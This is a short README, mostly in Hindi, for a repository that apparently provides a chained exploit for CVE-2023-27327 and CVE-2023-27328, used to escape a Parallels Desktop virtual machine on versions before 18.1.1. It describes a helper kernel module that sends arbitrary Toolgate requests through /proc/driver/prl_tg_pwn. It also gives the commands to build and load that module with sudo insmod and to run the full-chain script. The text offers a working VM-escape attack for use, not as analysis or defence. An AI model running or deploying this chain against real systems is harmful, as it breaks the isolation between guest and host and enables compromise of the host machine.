
Exploits for CVE-2023-27327 and CVE-2023-27328
इस रिपॉजिटरी में CVE-2023-27327 और CVE-2023-27328 के लिए एक्सप्लॉइट शामिल हैं, जिनका उपयोग Parallels Desktop 18.1.1 से पहले के संस्करणों में Parallels Desktop वर्चुअल मशीन से बाहर निकलने के लिए एक साथ किया जा सकता है।
इसमें prl_mod में एक आवश्यक कर्नेल मॉड्यूल के लिए कोड भी शामिल है, जिसका उपयोग /proc/driver/prl_tg_pwn पर बनाई गई proc एंट्री के माध्यम से यूजरलैंड से मनमाने Toolgate अनुरोध (< ऑपकोड 0x8000) भेजने के लिए किया जा सकता है।
कर्नेल मॉड्यूल को बनाएँ और लोड करें:
cd prl_mod
make -f Makefile.kmods
sudo insmod ./prl_tg_pwn/Toolgate/Guest/Linux/prl_tg/prl_tg_pwn.ko
एक्सप्लॉइट चलाएँ:
cd ..
pip install -r requirements.txt
./3_full_chain.py